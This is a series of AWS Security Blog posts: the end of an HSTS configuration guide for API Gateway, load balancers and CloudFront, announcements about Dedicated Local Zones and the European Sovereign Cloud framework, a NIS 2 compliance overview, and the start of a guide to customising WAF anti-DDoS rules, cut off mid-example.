3. Choose Integration response and under Header mappings, enter the HSTS header strict-transport-security. Add the Mapping value for the header as max-age=31536000; includeSubDomains; preload.

Figure 5: Integration response of the Rest Api

Figure 5: Integration response of the Rest Api

To test and validate, use the following command:

Verify HSTS implementation for both HTTP API and REST API using curl with response headers logged:

curl -i https://your-api-gateway-url.execute-
api.region.amazonaws.com/stage/resource

The expected response should include:

HTTP/2 200 

date: Tue, 20Β Sep 2025 16:34:35 GMT 
content-type: application/json 
content-length: 3 
x-amzn-requestid: 76543210-9aaa-4bbb-accc-987654321012
strict-transport-security: max-age=31536000;Β includeSubDomains; preload 
x-amz-apigw-id:Β ABCDEFGHIJKLMNO

Implementing HSTS with AWS Application Load Balancers

Application Load Balancers now provide built-in support for HTTP response header modification, including HSTS headers. This lets you enforce consistent security policies across all your services from a single point, reducing development effort and ensuring uniform protection regardless of which backend technologies you’re using.

Prerequisites and infrastructure requirements

Before implementing HSTS with load balancers, ensure your infrastructure meets these requirements:

  • Functional HTTPS listener – The ALB listener must be configured with HTTPS correctly.
  • Valid certificates – The ALB listener must have proper TLS certificate chain in AWS Certificate Manager and validation.
  • Application Load Balancer – The header modification feature for the ALB must be enabled for the listener since it is turned off by default.

Configuration

Application Load Balancers support direct HSTS header injection through the response header modification feature. This approach provides centralized security policy enforcement without requiring individual application configuration.

To enable HTTP header modification for your Application Load Balancer:

  1. Open the Amazon Elastic Compute Cloud (Amazon EC2) console and navigate to Load Balancers.
  2. Select your Application Load Balancer.
  3. On the Listeners and rules tab, select the HTTPS listener.
  4. On the Attributes tab, choose Edit.
    Figure 6: ALB HTTPS listener Attributes configuration

    Figure 6: ALB HTTPS listener Attributes configuration

  5. Expand the Add response headers section.
  6. Select Add HTTP Strict Transport Security (HSTS) header.
  7. To configure the header value, enter max-age=31536000; includeSubDomains; preload.
  8. Choose Save changes.
Figure 7: Add response headers in attributes configuration of the ALB HTTPS listener

Figure 7: Add response headers in attributes configuration of the ALB HTTPS listener

Header modification behavior

When ALB header modification is enabled:

  • Header addition – If the backend response doesn’t include the specified header, ALB adds it with the configured value
  • Header override – If the backend response includes the header, ALB replaces the existing value with the configured value
  • Centralized control – Responses from the load balancer include the configured security headers, ensuring consistent policy enforcement

To test and validate, use the following command:
curl -I https://my-loadbalancer-1234567890.us-west-2.elb.amazonaws.com

The following code example shows the expected response headers:

HTTP/2 200
date: Tue, 23 Sep 2025 16:34:35 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload

Header value constraints:

  • Maximum header value size – 1 KB
  • Supported characters – Alphanumeric (a-z, A-Z, 0-9) and special characters (_ :;.,/’?!(){}[]@<>=-+*#&`|~^%)
  • Empty values revert to default behavior (no header modification)

When implementing header modifications, there are several operational considerations to keep in mind. Header modification must be explicitly enabled on each listener where you want the functionality to work. Once enabled, any changes you configure will apply to all responses that come from the load balancer, affecting every request processed through that listener. Application Load Balancer performs basic input validation on the headers you configure, but it has limited capability for header-specific validation, so you should ensure your header configurations follow proper formatting and standards.

This built-in Application Load Balancer capability significantly simplifies HSTS implementation by eliminating the need for backend application modifications while providing centralized security policy enforcement across your entire application infrastructure.

Implementing HSTS with Amazon CloudFront

Amazon CloudFront provides built-in support for HTTP security headers, including HSTS, through response headers policies. This feature enables centralized security header management at the CDN edge, providing consistent policy enforcement across cached and non-cached content.

Response headers policy configuration

You can use the CloudFront response headers policy feature to configure security headers that are automatically added to responses served by your distribution. You can use managed response headers policies that include predefined values for the most common HTTP security headers. Or, you can create a custom response header policy with custom security headers and values that you can add to the required CloudFront behavior.

To configure security headers:

  1. On the CloudFront console, navigate to Policies and then Response headers.
  2. Choose Create response headers policy.
  3. Configure policy settings:
    • Name – HSTS-Security-Policy
    • Description – HSTS and security headers for web applications
  4. Under Security headers, configure:
    • Strict Transport Security – Select
    • Max age – 31,536,000 seconds (1 year)
    • Preload – Select (optional)
    • IncludeSubDomains – Select (optional)
  5. Add additional security headers:

    • X-Content-Type-Options
    • X-Frame-Options – Select Origin as β€œSAMEORIGIN”
    • Referrer-Policy – Select β€œstrict-origin-when-cross-origin”
    • X-XSS-Protection – Select β€œEnabled”, Tick β€œBlock”
    • Choose Create.
Figure 8: Configuring response header policy for the Cloudfront distribution

Figure 8: Configuring response header policy for the Cloudfront distribution

To attach the policy to the distribution:

  1. Navigate to your CloudFront distribution.
  2. Select the Behaviors tab.
  3. Edit the default behavior (or create a new one).
  4. Under Response headers policy, select your created policy.
  5. Choose Save changes.
Figure 9: Selecting the response headers policy

Figure 9: Selecting the response headers policy

Header override behavior:
CloudFront response headers policies provide origin override functionality that controls how headers are managed between the origin and CloudFront. When origin override is enabled, CloudFront will replace existing headers that come from the origin server. Conversely, when origin override is disabled, CloudFront will only add the policy-defined headers if those same headers are not already present in the origin response, preserving the original headers from the source.

To test and validate, use the following command:

curl -I https://your-cloudfront-domain.cloudfront.net

The following code example shows the expected response headers:

HTTP/2 200 
date: Tue, 23 Sep 2025 16:34:35 GMT 
strict-transport-security: max-age=31536000; includeSubDomains; preload 
x-content-type-options: nosniff 
x-frame-options: SAMEORIGIN 
referrer-policy: strict-origin-when-cross-origin 
x-xss-protection: 1; mode=block 
x-cache: Hit from cloudfront

Using CloudFront has several advantages. It offers consistent header application across all content types and centralized security policy management. Edge-level enforcement reduces latency, and no origin server modifications are required. AWS edge locations offer global policy distribution.

Security considerations and best practices

Implementing HSTS requires careful consideration of several security implications and operational requirements.

The max-age directive determines how long browsers will enforce HTTPS-only access. The duration guidelines are as follows:

  • 300 seconds (5 minutes) – Safe for experimentation during initial testing phase.
  • 86,400 seconds (1 day) – For short-term commitment such as development environments.
  • 259,2000 seconds (30 days) – For medium-term validation such as staging environments.
  • 31,536,000 seconds (1 year) – For long-term commitment such as production environments.

We recommend that you start with shorter max-age values during initial implementation and gradually increase them as you gain confidence in your HTTPS infrastructure stability.

The includeSubDomains directive extends HSTS enforcement to all subdomains. It offers several benefits, including comprehensive protection across the entire domain hierarchy, prevention of subdomain-based attacks, and simplified security policy management.

Requirements for using this directive include:

  • Subdomains should support HTTPS to use this directive effectively.
  • Subdomains should have valid SSL certificates.
  • You must maintain a consistent security policy across domain hierarchy.

Consider implementing HSTS preloading for maximum security coverage:

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload

Preloading benefits include protection for first-time visitors, browser-level enforcement before network requests, and maximizing security coverage.

The following are some preloading considerations:

  • It requires submission to browser preload lists.
  • It’s difficult to reverse because removal takes months.
  • It requires long-term commitment to HTTPS infrastructure.

For more information, see:

Conclusion

Implementing HSTS across AWS services provides a robust foundation for securing web applications against protocol downgrade attacks and enabling encrypted communications. By using the built-in capabilities of API Gateway, CloudFront, and Application Load Balancers, organizations can create comprehensive security policies that align with AWS Well-Architected Framework principles.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Abhishek Avinash Agawane Abhishek Avinash Agawane
Abhishek is a Security Consultant at Amazon Web Services with more than 8 years of industry experience. He helps organizations architect resilient, secure, and efficient cloud environments, guiding them through complex challenges and large-scale infrastructure transformations. He has helped numerous organizations enhance their cloud operations through targeted optimizations, robust architectures, and best-practice implementations.

Meet digital sovereignty needs with AWS Dedicated Local Zones expanded services

12 December 2025 at 18:05

At Amazon Web Services (AWS), we continue to invest in and deliver digital sovereignty solutions to help customers meet their most sensitive workload requirements. To address the regulatory and digital sovereignty needs of public sector and regulated industry customers, we launched AWS Dedicated Local Zones in 2023, with the Government Technology Agency of Singapore (GovTech Singapore) as our first customer.

Today, we’re excited to announce expanded service availability for Dedicated Local Zones, giving customers more choice and control without compromise. In addition to the data residency, sovereignty, and data isolation benefits they already enjoy, the expanded service list gives customers additional options for compute, storage, backup, and recovery.

Dedicated Local Zones are AWS infrastructure fully managed by AWS, built for exclusive use by a customer or community, and placed in a customer-specified location or data center. They help customers across the public sector and regulated industries meet security and compliance requirements for sensitive data and applications through a private infrastructure solution configured to meet their needs. Dedicated Local Zones can be operated by local AWS personnel and offer the same benefits of AWS Local Zones, such as elasticity, scalability, and pay-as-you-go pricing, with added security and governance features.

Since being launched, Dedicated Local Zones have supported a core set of compute, storage, database, containers, and other services and features for local processing. We continue to innovate and expand our offerings based on what we hear from customers to help meet their unique needs.

More choice and control without compromise

The following new services and capabilities deliver greater flexibility for customers to run their most critical workloads while maintaining strict data residency and sovereignty requirements.

New generation instance types

To support complex workloads in AI and high-performance computing, customers can now use newer generation instance types, including Amazon Elastic Compute Cloud (Amazon EC2) generation 7 with accelerated computing capabilities.

AWS storage options

AWS storage options provide two storage classes including Amazon Simple Storage Service (Amazon S3) Express One Zone, which offers high-performance storage for customers’ most frequently accessed data, and Amazon S3 One Zone-Infrequent Access, which is designed for data that is accessed less frequently and is ideal for backups.

Advanced block storage capabilities are delivered through Amazon Elastic Block Store (Amazon EBS) gp3 and io1 volumes, which customers can use to store data within a specific perimeter to support critical data isolation and residency requirements. By using the latest AWS general purpose SSD volumes (gp3), customers can provision performance independently of storage capacity with an up to 20% lower price per gigabyte than existing gp2 volumes. For intensive, latency-sensitive transactional workloads, such as enterprise databases, provisioned IOPS SSD (io1) volumes provide the necessary performance and reliability.

Backup and recovery capabilities

We have added backup and recovery capabilities through Amazon EBS Local Snapshots, which provides robust support for disaster recovery, data migration, and compliance. Customers can create backups within the same geographical boundary as EBS volumes, helping meet data isolation requirements. Customers can also create AWS Identity and Access Management (IAM) policies for their accounts to enable storing snapshots within the Dedicated Local Zone. To automate the creation and retention of local snapshots, customers can use Amazon Data Lifecycle Manager (DLM).

Customers can use local Amazon Machine Images (AMIs) to create and register AMIs while maintaining underlying local EBS snapshots within Dedicated Local Zones, helping achieve adherence to data residency requirements. By creating AMIs from EC2 instances or registering AMIs using locally stored snapshots, customers maintain complete control over their data’s geographical location.

Dedicated Local Zones meet the same high AWS security standards and sovereign-by-design principles that apply to AWS Regions and Local Zones. For instance, the AWS Nitro System provides the foundation with hardware- and software-level security. This is complemented by AWS Key Management Service (AWS KMS) and AWS Certificate Manager (ACM) for encryption management, Amazon Inspector, Amazon GuardDuty, and AWS Shield to help protect workloads, and AWS CloudTrail for audit logging of user and API activity across AWS accounts.

Continued innovation with GovTech Singapore

One of GovTech Singapore’s key focuses is on the nation’s digital government transformation and enhancing the public sector’s engineering capabilities. Our collaboration with GovTech Singapore involved configuring their Dedicated Local Zones with specific services and capabilities to support their workloads and meet stringent regulatory requirements. This architecture addresses data isolation and security requirements and ensures consistency and efficiency across Singapore Government cloud environments.

With the availability of the new AWS services with Dedicated Local Zones, government agencies can simplify operations and meet their digital sovereignty requirements more effectively. For instance, agencies can use Amazon Relational Database Service (Amazon RDS) to create new databases rapidly. Amazon RDS in Dedicated Local Zones helps simplify database management by automating tasks such as provisioning, configuring, backing up, and patching. This collaboration is just one example of how AWS innovates to meet customer needs and configures Dedicated Local Zones based on specific requirements.

Chua Khi Ann, Director of GovTech Singapore’s Government Digital Products division, who oversees the Cloud Programme, shared:
β€œThe deployment of Dedicated Local Zones by our Government on Commercial Cloud (GCC) team, in collaboration with AWS, now enables Singapore government agencies to host systems with confidential data in the cloud. By leveraging cloud-native services like advanced storage and compute, we can achieve better availability, resilience, and security of our systems, while reducing operational costs compared to on-premises infrastructure.”

Get started with Dedicated Local Zones

AWS understands that every customer has unique digital sovereignty needs, and we remain committed to offering customers the most advanced set of sovereignty controls and security features available in the cloud. Dedicated Local Zones are designed to be customizable, resilient, and scalable across different regulatory environments, so that customers can drive ongoing innovation while meeting their specific requirements.

Ready to explore how Dedicated Local Zones can support your organization’s digital sovereignty journey? Visit AWS Dedicated Local Zones to learn more.

TAGS: AWS Digital Sovereignty Pledge, Digital Sovereignty, Security Blog, Sovereign-by-design, Public Sector, Singapore, AWS Dedicated Local Zones

Max Peterson Max Peterson
Max is the Vice President of AWS Sovereign Cloud. He leads efforts to help public sector organizations modernize their missions with the cloud while meeting necessary digital sovereignty requirements. Max previously oversaw broader digital sovereignty efforts at AWS and served as the VP of AWS Worldwide Public Sector with a focus on empowering government, education, healthcare, and nonprofit organizations to drive rapid innovation.
StΓ©phane IsraΓ«l StΓ©phane IsraΓ«l
StΓ©phane is the Managing Director of the AWS European Sovereign Cloud and Digital Sovereignty. He is responsible for the management and operations of the AWS European Sovereign Cloud GmbH, including infrastructure, technology, and services, and leads broader worldwide digital sovereignty efforts at AWS. Prior to AWS, he was the CEO of Arianespace, where he oversaw numerous successful space missions, including the launch of the James Webb Space Telescope.

Exploring the new AWS European Sovereign Cloud: Sovereign Reference Framework

11 December 2025 at 22:59

At Amazon Web Services, we’re committed to deeply understanding the evolving needs of both our customers and regulators, and rapidly adapting and innovating to meet them. The upcoming AWS European Sovereign Cloud will be a new independent cloud for Europe, designed to give public sector organizations and customers in highly regulated industries further choice to meet their unique sovereignty requirements. The AWS European Sovereign Cloud expands on the same strong foundation of security, privacy, and compliance controls that apply to other AWS Regions around the globe with additional governance, technical, and operational measures to address stringent European customer and regulatory expectations. Sovereignty is the defining feature of the AWS European Sovereign Cloud and we’re using an independently validated framework to meet our customers’ requirements for sovereignty, while delivering the scalability and functionality you expect from the AWS Cloud.

Today, we’re pleased to share further details about the AWS European Sovereign Cloud: Sovereign Reference Framework (ESC-SRF). This reference framework aligns sovereignty criteria across multiple domains such as governance independence, operational control, data residency and technical isolation. Working backwards from our customers’ sovereign use cases, we aligned controls to each of the criteria and the AWS European Sovereign Cloud is undergoing an independent third-party audit to verify the design and operations of these controls conform to AWS sovereignty commitments. Customers and partners can also leverage the ESC-SRF as a foundation upon which they can build their own complementary sovereignty criteria and controls when using the AWS European Sovereign Cloud.

To clearly explain how the AWS European Sovereign Cloud meets sovereignty expectations, we’re publishing the ESC-SRF in AWS Artifact including the criteria and control mapping. In AWS Artifact, our self-service audit artifact retrieval portal, you have on-demand access to AWS security and compliance documents and AWS agreements. You can now use the ESC-SRF to define best practices for your own use case, map these to controls, and illustrate how you meet and even exceed sovereign needs of your customers.

A transparent and validated sovereignty model

The ESC-SRF has been built from customer feedback, regulatory requirements across the European Union (EU), industry frameworks, AWS contractual commitments, and partner input. ESC-SRF is industry and sector agnostic, as it’s written to address fundamental sovereignty needs and expectations at the foundational layer of our cloud offerings with additional sovereignty-specific requirements and controls that apply exclusively to the AWS European Sovereign Cloud. Each criterion is implemented through sovereign controls that will be independently validated by a third-party auditor.

The framework builds on core AWS security capabilities, including encryption, key management, access governance, AWS Nitro System-based isolation, and internationally recognized compliance certifications. The framework adds sovereign-specific governance, technical, and operational measures such as independent EU corporate structures, dedicated EU trust and certificate services, operations by AWS EU-resident personnel, strict residency for customer data and customer created metadata, separation from all other AWS Regions, and incident response operated within the EU.

These controls are the basis of a dedicated AWS European Sovereign Cloud System and Organization Controls (SOC) 2 attestation. The ESC-SRF establishes a solid foundation for sovereignty of the cloud, so that customers can focus on defining sovereignty measures in the cloud that are tailored to their goals, regulatory needs, and risk posture.

How you can use the ESC-SRF

The ESC-SRF describes how AWS implements and validates sovereignty controls in the AWS European Sovereign Cloud. AWS treats each criterion as binding and its implementation will be validated by an independent third-party auditor in 2026. While most customers don’t operate at the size and scale of AWS, you can use the ESC-SRF as both an assurance model and a reference framework you can adapt to your specific use cases.

From an assurance perspective, it provides end-to-end visibility for each sovereignty criterion through to its technical implementation. We will also provide third-party validation in the AWS European Sovereign Cloud SOC 2 report. Customers can use this report with internal auditors, external assessors, supervisory authorities, and regulators. This can reduce the need for ad-hoc evidence requests and supports customers by providing them with evidence to demonstrate clear and enforceable sovereignty assurances.

From a design perspective, you can refer to the framework when shaping your own sovereignty architecture, selecting configurations, and defining internal controls to meet regulatory, contractual, and mission-specific requirements. Because the ESC-SRF is industry and sector agnostic, you can apply criteria from the framework to suit your own unique needs. Depending on your sovereign use case, not all criteria may apply to your use case sovereign needs. The ESC-SRF can also be used in conjunction with AWS Well-Architected which can help you learn, measure, and build using architectural best practices. Where appropriate you can create your version of the ESC-SRF, map to controls, and have them tested by a third party. To download the ESC-SRF, visit AWS Artifact (login required).

A strong, clear foundation

The publication of the ESC-SRF is part of our ongoing commitment to delivering on the AWS Digital Sovereignty Pledge through transparency and assurances to help customers meet their evolving sovereignty needs with assurances designed, implemented, and validated entirely within the EU. Within the framework, customers can build solutions in the AWS European Sovereign Cloud with confidence and a strong understanding of how they are able to meet their sovereignty goals using AWS.

For more information about the AWS European Sovereign Cloud, visit aws.eu.


If you have feedback about this post, submit comments in the Comments section below.

Andreas Terwellen

Andreas Terwellen

Andreas is a Senior Manager in security audit assurance at AWS, based in Frankfurt, Germany. His team is responsible for third-party and customer audits, attestations, certifications, and assessments across Europe. Previously, he was a CISO in a DAX-listed telecommunications company in Germany. He also worked for various consulting companies managing large teams and programs across multiple industries and sectors.

Embracing our broad responsibility for securing digital infrastructure in the European Union

11 December 2025 at 01:53

August 31, 2023: The date this blog post was first published.


Over the past few decades, digital technologies have brought tremendous benefits to our societies, governments, businesses, and everyday lives. The increasing reliance on digital technologies comes with a broad responsibility for society, companies, and governments to ensure that security remains robust and uncompromising, regardless of the use case.

At Amazon Web Services (AWS), every employee is responsible for ensuring that security is an integral component of every facet of the business. This commitment positions AWS well as the cybersecurity regulatory landscape continues to evolve and mature across Europe.

The Directive on Measures for a High Common Level of Cybersecurity Across the Union (NIS 2), formally adopted by the European Parliament and the Council of the European Union (EU) as Directive (EU) 2022/2555 and applicable across the EU since October 2024, is a prime example of this evolution. As of December 2025, most EU Member States have transposed NIS 2 into national law, though full enforcement timelines now extend into 2025–2026 in several jurisdictions as the transition to the new regime continues. National implementation timelines and requirements vary across EU Member States, and the Directive aims to strengthen cybersecurity across the EU.

AWS is excited to help customers become more resilient, and we look forward to even closer cooperation with national cybersecurity authorities to raise the bar on cybersecurity across Europe. Building society’s trust in the online environment is key to harnessing the power of innovation for social and economic development. It’s also one of our core Leadership Principles: Success and scale bring broad responsibility.

Compliance with NIS 2

NIS 2 seeks to ensure that entities mitigate the risks posed by cyber threats, minimize the impact of incidents, and protect the continuity of essential and important services in the EU.

NIS 2 establishes a strengthened EU-wide framework for cybersecurity, imposing risk-based and proportionate obligations on essential and important entities across critical sectors. It mandates a set of measuresβ€”including governance, incident management, business continuity, supply chain security, access controls, and cryptographyβ€”to ensure effective protection of network and information systems tailored to each entity’s specific risk profile, size, and sector. These measures must cover the full cybersecurity lifecycle (identification, protection, detection, response, recovery, and communication), with requirements for regular testing, supply chain risk management, and reporting significant incidents to national authorities.

In several countries, aspects of AWS offerings are already part of the national critical infrastructure. For example, in Germany, Amazon Elastic Compute Cloud (Amazon EC2) and Amazon CloudFront are in scope for the KRITIS regulation. For several years, AWS has fulfilled its obligations to secure these services, run audits related to national critical infrastructure, and have established channels for exchanging security information with the German Federal Office for Information Security (BSI) KRITIS office. AWS is also part of the UP KRITIS initiative, a cooperative effort between industry and the German Government to set industry standards.

AWS will continue to support customers in implementing resilient solutions, in accordance with the AWS Shared Responsibility Model. AWS supports customers in aligning with the NIS 2 Directive (EU) 2022/2555 and its Implementing Regulation (EU) 2024/2690 through services, global infrastructure, and independently audited compliance programs that enable essential and important entities to address a wide range of NIS 2 obligations, from governance, risk management, and incident reporting to business continuity and supply chain security, and cryptographic controls.

AWS cybersecurity risk management – Current status

AWS has been helping customers enhance their resilience and incident response capabilities long before NIS 2 was introduced. Our core infrastructure is designed to satisfy the security requirements of the military, global banks, and other highly sensitive organizations.

AWS provides information and communication technology services and building blocks that businesses, public authorities, universities, and individuals can use to become more secure, innovative, and responsive to their own needs and the needs of their customers. Security and compliance remain a shared responsibility between AWS and the customer. We make sure that the AWS cloud infrastructure complies with applicable regulatory requirements and good practices for cloud providers, and customers remain responsible for building compliant workloads in the cloud.

AWS offers over 150 independently audited security standards compliance certifications and attestations worldwide such as ISO 27001, ISO 22301, ISO 20000, ISO 27017, and System and Organization Controls (SOC) 2. The following are some examples of European certifications and attestations that we’ve achieved:

  • C5 – provides a wide-ranging control framework for establishing and evidencing the security of cloud operations in Germany.
  • ENS High – comprises principles for adequate protection applicable to government agencies and public organizations in Spain. The CCN has aligned ENS (through its PCE-NIS2 profile in CCN-STIC Guide 892) as a certifiable route to NIS 2 compliance in Spain, with advisory support through ENISA’s mappings and European Commission (EC) transposition guidelines.
  • HDS – demonstrates an adequate framework for technical and governance measures to secure and protect personal health data, governed by French law.
  • Pinakes – provides a rating framework intended to manage and monitor the cybersecurity controls of service providers upon which Spanish financial entities depend.

These and other AWS Compliance Programs help customers understand the robust controls in place at AWS to help ensure the security and compliance of the cloud. Through dedicated teams, we’re prepared to provide assurance about the approach that AWS has taken to operational resilience and to help customers achieve assurance about the security and resiliency of their workloads. AWS Artifact provides on-demand access to these security and compliance reports and many more.

For security in the cloud, it’s crucial for our customers to make security by design and security by default central tenets of product development. Customers can use the AWS Well-Architected Framework to help build secure, high-performing, resilient, and efficient infrastructure for a variety of applications and workloads.

Customers that use the AWS Cloud Adoption Framework (AWS CAF) can improve cloud readiness by identifying and prioritizing transformation opportunities. These foundational resources help customers secure regulated workloads. AWS Security Hub provides customers with a comprehensive view of their security state on AWS and helps them check their environments against industry standards and good practices.

With regards to the cybersecurity risk management measures and reporting obligations that NIS 2 mandates, existing AWS service offerings can help customers fulfil their part of the shared responsibility model and comply with current national implementations of NIS 2. AWS CloudTrail provides centralized audit logging, while Amazon CloudWatch offers metrics, alarms, and application log analysis. With AWS Config, customers can continually assess, audit, and evaluate the configurations and relationships of selected resources on AWS, on premises, and on other clouds. Furthermore, AWS Whitepapers, such as the AWS Security Incident Response Guide, help customers understand, implement, and manage fundamental security concepts in their cloud architecture.

The updated NIS 2 Considerations for AWS Customers guide (December 2025) features a mapping table that links the Annex requirements to specific AWS capabilities, empowering entities to interpret obligations and deploy proportionate controls efficiently. Customers can use services such as Security Hub for centralized security alerts, AWS Config for resource inventory, AWS Audit Manager for automated evidence collection, Amazon Inspector for vulnerability management, and AWS Resilience Hub for resilience assessments.

NIS 2 foresees the development and implementation of comprehensive cybersecurity awareness training programs for management bodies and employees. At AWS, we provide various training programs at no cost to the public to increase awareness on cybersecurity, such as the AWS Security Learning Hub, including phishing simulations, cloud security fundamentals, and role-based modules, available at no cost to AWS customers. Customers can deliver organization-wide training using AWS Skill Builder modules on phishing, cyber hygiene, and secure cloud practices, assign role-specific paths, and track completion across accounts using AWS Organizations.

AWS cooperation with authorities

At Amazon, we strive to be the world’s most customer-centric company. For AWS Security Assurance, that means having teams that continuously engage with authorities to understand and exceed regulatory and customer obligations on behalf of customers. This is one way that we raise the security bar in Europe. At the same time, we recommend that national regulators carefully assess potentially conflicting, overlapping, or contradictory measures.

We also cooperate with cybersecurity agencies around the globe because we recognize the importance of their role in keeping the world safe. To that end, we have built the AWS Global Cloud Security Program (GCSP) to provide agencies with a direct and consistent line of communication to the AWS Security team. Two examples of GCSP members are the Dutch National Cyber Security Centrum (NCSC-NL), with whom we signed a cooperation agreement in May 2023, and the Italian National Cybersecurity Agency (ACN).

In Spain, AWS signed a strategic collaboration agreement (MoU) with the National Intelligence Center and National Cryptologic Center (CNI-CCN) in August 2023 to promote cybersecurity and innovation in the public sector through AWS Cloud technology. As a result, the CCN joined the GCSP, and the partnership has produced eight STIC guides (Series 887) on topics including hardening, incident response, monitoring, for multi-cloud and hybrid environments. The partnership also produced the ENS Landing Zone template (CCN-STIC-887 Anexo A), which customers can download from the CCN website to deploy ENS-compliant cloud environments. In addition to ENS High accreditation, more than 25 AWS cloud services have been accredited by the CCN under the Security Catalog of Products and Services (CPSTIC) for processing sensitive and classified workloads in Spain.

Together, we will continue to work on cybersecurity initiatives and strengthen the cybersecurity posture across the EU. With the war in Ukraine, we have experienced how important such a collaboration can be. AWS has played an important role in helping Ukraine’s government maintain continuity and provide critical services to citizens since the onset of the war.

The way forward

At AWS, we will continue to provide key stakeholders with greater insights into how we help customers tackle their most challenging cybersecurity issues and provide opportunities to deep dive into what we’re building. We look forward to continuing our work with authorities, agencies and, most importantly, our customers to provide for the best solutions and raise the bar on cybersecurity and resilience across the EU and globally.

The updated NIS 2 Considerations for AWS Customers guide (December 2025) and the AWS Compliance Center serve as central hubs for the latest resources, including mappings to ENISA Technical Implementation Guidance (26 June 2025), whitepapers, and audit-ready documentation. Entities can begin with AWS Control Tower or Landing Zone Accelerator to establish secure baselines, then apply the Well-Architected Framework (Security and Reliability Pillars) to design auditable, resilient architectures. For organizations seeking external expertise, AWS Marketplace partners offer specialized support in gap analysis, resilience testing, and ENISA mapping implementation.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Ashley Lam

Ashley Lam

Ashley is the Senior Security Assurance Lead for AWS in the UK and Ireland region. With 10 years of extensive program management experience, she excels in regulatory and customer compliance. Drawing from security, compliance, and cloud operations expertise in betting & gaming and telecoms industries, she leads engagements with regulators and stakeholders to drive secure cloud adoption.

Frank Adelmann

Frank Adelmann

Frank is the Regulated Industry and Security Engagement Lead for Regulated Commercial Sectors in Europe. He joined AWS in 2022 after working as a regulator in the European financial sector, technical advisor on cybersecurity matters in the International Monetary Fund, and Head of Information Security in the European Commodity Clearing AG. Today, Frank is passionately engaging with European regulators to understand and exceed regulatory and customer expectations.

How to customize your response to layer 7 DDoS attacks using AWS WAF Anti-DDoS AMR

10 December 2025 at 05:41

Over the first half of this year, AWS WAF introduced new application-layer protections to address the growing trend of short-lived, high-throughput Layer 7 (L7) distributed denial of service (DDoS) attacks. These protections are provided through the AWS WAF Anti-DDoS AWS Managed Rules (Anti-DDoS AMR) rule group. While the default configuration is effective for most workloads, you might want to tailor the response to match your application’s risk tolerance.

In this post, you’ll learn how the Anti-DDoS AMR works, and how you can customize its behavior using labels and additional AWS WAF rules. You’ll walk through three practical scenarios, each demonstrating a different customization technique.

How the Anti-DDoS AMR works at a high level

The Anti-DDoS AMR establishes a baseline of your traffic and uses it to detect anomalies within seconds. As shown in Figure 1, when the Anti-DDoS AMR detects a DDoS attack, it adds the event-detected label to all incoming requests, and the ddos-request label to incoming requests that are suspected of contributing to the attack. It also adds an additional confidence-based label, such as high-suspicion-ddos-request, when the request is suspected of contributing to the attack. In AWS WAF, a label is metadata added to a request by a rule when the rule matches the request. After being added, a label is available for subsequent rules, which can use it to enrich their evaluation logic. The Anti-DDoS AMR uses the added labels to mitigate the DDoS attack.

Figure 1 – Anti-DDOS AMR process flow

Figure 1 – Anti-DDOS AMR process flow

Default mitigations are based on a combination of Block and JavaScript Challenge actions. The Challenge action can only be handled properly by a client that’s expecting HTML content. For this reason, you need to exclude the paths of non-challengeable requests (such as API fetches) in the Anti-DDoS AMR configuration. The Anti-DDoS AMR applies the challengeable-request label to requests that don’t match the configured challenge exclusions. By default, the following mitigation rules are evaluated in order:

  • ChallengeAllDuringEvent, which is equivalent of the following logic: IF event-detected AND challengeable-request THEN challenge.
  • ChallengeDDoSRequests, which is equivalent to the following logic: IF (high-suspicion-ddos-request OR medium-suspicion-ddos-request OR low-suspicion-ddos-request) AND challengeable-request THEN challenge. Its sensitivity can be changed to match your needs, such as only challenge medium and high suspicious DDoS requests.
  • DDoSRequests, which is equivalent to the following logic: IF high-suspicion-ddos-request THEN block. Its sensitivity can be changed to match your needs, such as block medium in addition to high suspicious DDoS requests.

Customizing your response to layer 7 DDoS attacks

This customization can be done using two different approaches. In the first approach, you configure the Anti-DDoS AMR to take the action you want, then you add subsequent rules to further harden your response under certain conditions. In the second approach, you change some or all the rules of the Anti-DDoS AMR to count mode, then create additional rules that define your response to DDoS attacks.

In both approaches, the subsequent rules are configured using conditions you define, combined with conditions based on labels applied to requests by the Anti-DDoS AMR. The following section includes three examples of customizing your response to DDoS attacks. The first two examples are based on the first approach, while the last one is based on the second approach.

Example 1: More sensitive mitigation outside of core countries

Let’s suppose that your main business is conducted in two main countries, the UAE and KSA. You are happy with the default behavior of the Anti-DDoS AMR in these countries, but you want to block more aggressively outside of these countries. You can implement this using the following rules:

  • Anti-DDoS AMR with default configurations
  • A custom rule that blocks if the following conditions are met: Request is initiated from outside of UAE or KSA AND request has high-suspicion-ddos-request or medium-suspicion-ddos-request labels

Configuration

After adding your Anti-DDoS AMR with default configuration, create a subsequent custom rule with the following JSON definition.

Note: You need to use the AWS WAF JSON rule editor or infrastructure-as-code (IaC) tools (such as AWS CloudFormation or Terraform) to define this rule. The current AWS WAF console doesn’t allow creating rules with multiple AND/OR logic nesting.

{
    "Action": {
        "Block": {}
    },
    "Name": "more-sensitive-ddos-mitigation-outside-of-core-countries",
    "Priority": 1,
    "Statement": {
        "AndStatement": {
            "Statements": [
                {
                    "NotStatement": {
                        "Statement": {
                            "GeoMatchStatement": {
                                "CountryCodes": [
                                    "AE",
                                    "SA"
                                ]
                            }
                        }
                    }
                },
                {
                    "OrStatement": {
                        "Statements": [
                            {
                                "LabelMatchStatement": {
                                    "Key": "awswaf:managed:aws:anti-ddos:medium-suspicion-ddos-request",
                                    "Scope": "LABEL"
                                }
                            },
                            {
                                "LabelMatchStatement": {
                                    "Key": "awswaf:managed:aws:anti-ddos:high-suspicion-ddos-request",
                                    "Scope": "LABEL"
                                }
                            }
                        ]
                    }
                }
            ]
        }
    },
    "VisibilityConfig": {
        "CloudWatchMetricsEnabled": true,
        "MetricName": "more-sensitive-ddos-mitigation-outside-of-core-countries",
        "SampledRequestsEnabled": true
    }
}

Similarly, during an attack, you can more aggressively mitigate requests from unusual sources, such as requests labeled by the Anonymous IP managed rule group as coming from web hosting and cloud providers.

Example 2: Lower rate-limiting thresholds during DDoS attacks

Suppose that your application has sensitive URLs that are compute heavy. To protect the availability of your application, you have applied a rate limiting rule to these URLs configured with a 100 requests threshold over 2 mins window. You can harden this response during a DDoS attack by applying a more aggressive threshold. You can implement this using the following rules:

  1. An Anti-DDoS AMR with default configurations
